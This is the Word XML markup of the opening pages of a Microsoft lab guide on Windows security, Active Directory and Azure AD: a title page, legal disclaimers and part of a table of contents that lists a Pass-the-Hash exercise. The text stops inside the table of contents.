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C4521D" w14:textId="77777777" w:rsidR="00F56577" w:rsidRDefault="002B6913" w:rsidP="00A150F9">
      <w:pPr>
        <w:pStyle w:val="NameofWorkshop"/>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc492638964"/>
      <w:bookmarkStart w:id="1" w:name="_Toc492640496"/>
      <w:bookmarkStart w:id="2" w:name="_Toc492640573"/>
      <w:r>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidR="00F36A4D">
        <w:t xml:space="preserve"> security, </w:t>
      </w:r>
      <w:r w:rsidR="00BA5AEC">
        <w:t>Active Directory</w:t>
      </w:r>
      <w:r w:rsidR="00F36A4D">
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r>
        <w:t>Azure AD</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="0"/>
    <w:bookmarkEnd w:id="1"/>
    <w:bookmarkEnd w:id="2"/>
    <w:p w14:paraId="0FE582B4" w14:textId="01AF9694" w:rsidR="00D759E3" w:rsidRPr="007E3D91" w:rsidRDefault="00497083" w:rsidP="00D151E4">
      <w:pPr>
        <w:pStyle w:val="NameofWorkshop"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t>TD11</w:t>
      </w:r>
      <w:r w:rsidR="00122DB5">
        <w:rPr>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve"> – Module </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="00122DB5">
        <w:rPr>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve"> – Section </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="00122DB5">
        <w:rPr>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="672A6659" w14:textId="77777777" w:rsidR="00D759E3" w:rsidRPr="007E3D91" w:rsidRDefault="00D759E3" w:rsidP="007E3D91"/>
    <w:p w14:paraId="27B103CA" w14:textId="35F9F17E" w:rsidR="000A0F55" w:rsidRPr="007E3D91" w:rsidRDefault="00A24769" w:rsidP="000A0F55">
      <w:pPr>
        <w:jc w:val="right"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">June </w:t>
      </w:r>
      <w:r w:rsidR="000A0F55">
        <w:t>20</w:t>
      </w:r>
      <w:r>
        <w:t>20</w:t>
      </w:r>
      <w:r w:rsidR="000A0F55">
        <w:br/>
        <w:t>V</w:t>
      </w:r>
      <w:r w:rsidR="00716FE2">
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidR="000A0F55">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00716FE2">
        <w:t>0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A37501D" w14:textId="77777777" w:rsidR="00E512F9" w:rsidRDefault="00E512F9">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FC4A952" w14:textId="77777777" w:rsidR="00D67112" w:rsidRPr="00962C09" w:rsidRDefault="00D67112" w:rsidP="00D67112">
      <w:r w:rsidRPr="00962C09">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Information in this document, including URL and other Internet Web site </w:t>
      </w:r>
      <w:r>
        <w:t>references, is subject to change</w:t>
      </w:r>
      <w:r w:rsidRPr="00962C09">
        <w:t xml:space="preserve"> without notice. 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60CCFBE9" w14:textId="77777777" w:rsidR="00D67112" w:rsidRPr="00962C09" w:rsidRDefault="00D67112" w:rsidP="00D67112">
      <w:pPr>
        <w:spacing w:after="120" w:line="260" w:lineRule="exact"/>
      </w:pPr>
      <w:r w:rsidRPr="00962C09">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24E6FA69" w14:textId="77777777" w:rsidR="00D67112" w:rsidRDefault="00D67112" w:rsidP="00D67112">
      <w:pPr>
        <w:spacing w:after="120" w:line="260" w:lineRule="exact"/>
      </w:pPr>
      <w:r w:rsidRPr="00962C09">
        <w:t>The names of manufacturers, products, or URLs are provided for informational purposes only</w:t>
      </w:r>
      <w:r w:rsidR="00F40CF9">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00962C09">
        <w:t xml:space="preserve"> and Microsoft makes no representations and warranties, either expressed, implied, or statutory, regarding these manufacturers or the use of the products with any Microsoft technologies. The inclusion of a manufacturer or product does not imply endorsement of Microsoft of the manufacturer or product. Links may be provided to third</w:t>
      </w:r>
      <w:r w:rsidR="00F40CF9">
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="00962C09">
        <w:t>party sites. Such sites are not under the control of Microsoft and Microsoft is not responsible for the contents of any linked site or any link contained in a linked site, or any changes or updates to such sites. Microsoft is not responsible for webcasting or any other form of transmission received from any linked site. Microsoft is providing these links to you only as a convenience, and the inclusion of any link does not imply endorsement of Microsoft of the site or the products contained therein.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DAB6C7B" w14:textId="77777777" w:rsidR="006F76A6" w:rsidRDefault="006F76A6" w:rsidP="00D67112">
      <w:pPr>
        <w:spacing w:after="120" w:line="260" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B0071C4" w14:textId="77777777" w:rsidR="006F76A6" w:rsidRPr="00962C09" w:rsidRDefault="006F76A6" w:rsidP="006F76A6">
      <w:pPr>
        <w:spacing w:after="120" w:line="260" w:lineRule="exact"/>
      </w:pPr>
      <w:r w:rsidRPr="00AC2CCF">
        <w:t xml:space="preserve">This </w:t>
      </w:r>
      <w:r>
        <w:t>training</w:t>
      </w:r>
      <w:r w:rsidRPr="00AC2CCF">
        <w:t xml:space="preserve"> uses various tools and utilities downloaded from the Internet for the classroom environment.  </w:t>
      </w:r>
      <w:r w:rsidR="00CF6C88">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00AC2CCF">
        <w:t>Downloading any tools, installing and using them should only be done at your own risk  security checked the tools in a test environment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71DA2AB8" w14:textId="706C109A" w:rsidR="00D67112" w:rsidRPr="00962C09" w:rsidRDefault="00D67112" w:rsidP="00D67112">
      <w:pPr>
        <w:spacing w:after="120" w:line="260" w:lineRule="exact"/>
      </w:pPr>
      <w:r w:rsidRPr="00962C09">
        <w:t xml:space="preserve">© </w:t>
      </w:r>
      <w:r w:rsidRPr="00386661">
        <w:t>20</w:t>
      </w:r>
      <w:r w:rsidR="00DB45B4">
        <w:t>20</w:t>
      </w:r>
      <w:r w:rsidRPr="00962C09">
        <w:t xml:space="preserve"> Microsoft Corporation. All rights reserved.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E75C540" w14:textId="77777777" w:rsidR="00D67112" w:rsidRPr="003779C9" w:rsidRDefault="00D67112" w:rsidP="00D67112">
      <w:pPr>
        <w:spacing w:after="120" w:line="260" w:lineRule="exact"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003779C9">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Microsoft and the trademarks listed at </w:t>
      </w:r>
      <w:hyperlink r:id="rId11" w:history="1">
        <w:r w:rsidRPr="003779C9">
          <w:rPr>
            <w:rStyle w:val="Lienhypertexte"/>
            <w:sz w:val="18"/>
            <w:szCs w:val="18"/>
          </w:rPr>
          <w:t>https://www.microsoft.com/en-us/legal/intellectualproperty/Trademarks/Usage/General.aspx</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="003779C9">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> are trademarks of the Microsoft group of companies. All other trademarks are </w:t>
      </w:r>
      <w:r w:rsidR="00F40CF9">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidRPr="003779C9">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>property of their respective owners</w:t>
      </w:r>
      <w:r w:rsidR="00A70451" w:rsidRPr="003779C9">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02EB378F" w14:textId="77777777" w:rsidR="00E512F9" w:rsidRDefault="00E512F9" w:rsidP="00E512F9"/>
    <w:p w14:paraId="6A05A809" w14:textId="77777777" w:rsidR="00E512F9" w:rsidRDefault="00E512F9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:sdt>
      <w:sdtPr>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Segoe UI" w:cstheme="minorBidi"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:id w:val="745848589"/>
        <w:docPartObj>
          <w:docPartGallery w:val="Table of Contents"/>
          <w:docPartUnique/>
        </w:docPartObj>
      </w:sdtPr>
      <w:sdtEndPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
      </w:sdtEndPr>
      <w:sdtContent>
        <w:p w14:paraId="406425CA" w14:textId="77777777" w:rsidR="00D53599" w:rsidRDefault="00D53599">
          <w:pPr>
            <w:pStyle w:val="En-ttedetabledesmatires"/>
          </w:pPr>
          <w:r>
            <w:t>Contents</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="7CB1E24A" w14:textId="5B2E1DC0" w:rsidR="005A25CB" w:rsidRDefault="00952D66">
          <w:pPr>
            <w:pStyle w:val="TM1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="10790"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:b w:val="0"/>
              <w:bCs w:val="0"/>
              <w:noProof/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
              <w:lang w:val="fr-FR" w:eastAsia="fr-FR"/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:b w:val="0"/>
              <w:bCs w:val="0"/>
            </w:rPr>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:b w:val="0"/>
              <w:bCs w:val="0"/>
            </w:rPr>
            <w:instrText xml:space="preserve"> TOC \o "1-4" \h \z \u </w:instrText>
          </w:r>
          <w:r>
            <w:rPr>
              <w:b w:val="0"/>
              <w:bCs w:val="0"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:hyperlink w:anchor="_Toc44074048" w:history="1">
            <w:r w:rsidR="005A25CB" w:rsidRPr="00BC2ACA">
              <w:rPr>
                <w:rStyle w:val="Lienhypertexte"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Windows security, Active Directory and Azure AD Lab step-by-step</w:t>
            </w:r>
            <w:r w:rsidR="005A25CB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="005A25CB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="005A25CB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc44074048 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="005A25CB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="005A25CB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="005A25CB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="005A25CB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4F431F40" w14:textId="1FEA2F18" w:rsidR="005A25CB" w:rsidRDefault="00A608B1">
          <w:pPr>
            <w:pStyle w:val="TM2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="10790"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:iCs w:val="0"/>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w:lang w:val="fr-FR" w:eastAsia="fr-FR"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc44074049" w:history="1">
            <w:r w:rsidR="005A25CB" w:rsidRPr="00BC2ACA">
              <w:rPr>
                <w:rStyle w:val="Lienhypertexte"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Abstract and learning objectives</w:t>
            </w:r>
            <w:r w:rsidR="005A25CB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="005A25CB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="005A25CB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc44074049 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="005A25CB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="005A25CB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="005A25CB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="005A25CB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5D12C984" w14:textId="1B085215" w:rsidR="005A25CB" w:rsidRDefault="00A608B1">
          <w:pPr>
            <w:pStyle w:val="TM2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="10790"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:iCs w:val="0"/>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w:lang w:val="fr-FR" w:eastAsia="fr-FR"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc44074050" w:history="1">
            <w:r w:rsidR="005A25CB" w:rsidRPr="00BC2ACA">
              <w:rPr>
                <w:rStyle w:val="Lienhypertexte"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Overview</w:t>
            </w:r>
            <w:r w:rsidR="005A25CB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="005A25CB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="005A25CB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc44074050 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="005A25CB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="005A25CB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="005A25CB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r w:rsidR="005A25CB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="34C9C30B" w14:textId="00D603FA" w:rsidR="005A25CB" w:rsidRDefault="00A608B1">
          <w:pPr>
            <w:pStyle w:val="TM2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="10790"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:iCs w:val="0"/>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w:lang w:val="fr-FR" w:eastAsia="fr-FR"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc44074051" w:history="1">
            <w:r w:rsidR="005A25CB" w:rsidRPr="00BC2ACA">
              <w:rPr>
                <w:rStyle w:val="Lienhypertexte"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Requirements</w:t>
            </w:r>
            <w:r w:rsidR="005A25CB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="005A25CB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="005A25CB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc44074051 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="005A25CB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="005A25CB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="005A25CB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r w:rsidR="005A25CB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3B4C3AAA" w14:textId="32894BFF" w:rsidR="005A25CB" w:rsidRDefault="00A608B1">
          <w:pPr>
            <w:pStyle w:val="TM2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="10790"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:iCs w:val="0"/>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w:lang w:val="fr-FR" w:eastAsia="fr-FR"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc44074052" w:history="1">
            <w:r w:rsidR="005A25CB" w:rsidRPr="00BC2ACA">
              <w:rPr>
                <w:rStyle w:val="Lienhypertexte"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Before the exercise</w:t>
            </w:r>
            <w:r w:rsidR="005A25CB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="005A25CB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="005A25CB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc44074052 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="005A25CB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="005A25CB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="005A25CB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
            <w:r w:rsidR="005A25CB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7673520A" w14:textId="08AA76AE" w:rsidR="005A25CB" w:rsidRDefault="00A608B1">
          <w:pPr>
            <w:pStyle w:val="TM4"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="10790"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
              <w:lang w:val="fr-FR" w:eastAsia="fr-FR"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc44074053" w:history="1">
            <w:r w:rsidR="005A25CB" w:rsidRPr="00BC2ACA">
              <w:rPr>
                <w:rStyle w:val="Lienhypertexte"/>
                <w:noProof/>
              </w:rPr>
              <w:t>List of VM to start</w:t>
            </w:r>
            <w:r w:rsidR="005A25CB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="005A25CB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="005A25CB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc44074053 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="005A25CB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="005A25CB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="005A25CB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
            <w:r w:rsidR="005A25CB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="411F3202" w14:textId="0123D2F4" w:rsidR="005A25CB" w:rsidRDefault="00A608B1">
          <w:pPr>
            <w:pStyle w:val="TM4"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="10790"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
              <w:lang w:val="fr-FR" w:eastAsia="fr-FR"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc44074054" w:history="1">
            <w:r w:rsidR="005A25CB" w:rsidRPr="00BC2ACA">
              <w:rPr>
                <w:rStyle w:val="Lienhypertexte"/>
                <w:noProof/>
              </w:rPr>
              <w:t>How to start and connect to a VM</w:t>
            </w:r>
            <w:r w:rsidR="005A25CB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="005A25CB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="005A25CB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc44074054 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="005A25CB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="005A25CB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="005A25CB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
            <w:r w:rsidR="005A25CB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="64CE519D" w14:textId="6BDAAD36" w:rsidR="005A25CB" w:rsidRDefault="00A608B1">
          <w:pPr>
            <w:pStyle w:val="TM2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="10790"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:iCs w:val="0"/>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w:lang w:val="fr-FR" w:eastAsia="fr-FR"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc44074055" w:history="1">
            <w:r w:rsidR="005A25CB" w:rsidRPr="00BC2ACA">
              <w:rPr>
                <w:rStyle w:val="Lienhypertexte"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Exercise 1: Pass the Hash</w:t>
            </w:r>
            <w:r w:rsidR="005A25CB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="005A25CB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="005A25CB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc44074055 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="005A25CB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="005A25CB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="005A25CB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
            <w:r w:rsidR="005A25CB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5A1DDA89" w14:textId="11B055A6" w:rsidR="005A25CB" w:rsidRDefault="00A608B1">
          <w:pPr>
            <w:pStyle w:val="TM4"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="10790"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
              <w:lang w:val="fr-FR" w:eastAsia="fr-FR"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc44074056" w:history="1">
            <w:r w:rsidR="005A25CB" w:rsidRPr="00BC2ACA">
              <w:rPr>
                <w:rStyle w:val="Lienhypertexte"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Task 1: Pass the Hash</w:t>
            </w:r>
            <w:r w:rsidR="005A25CB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="005A25CB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="005A25CB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc44074056 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="005A25CB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="005A25CB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="005A25CB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
            <w:r w:rsidR="005A25CB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4655A631" w14:textId="2CC6E264" w:rsidR="005A25CB" w:rsidRDefault="00A608B1">
          <w:pPr>
            <w:pStyle w:val="TM4"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="10790"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
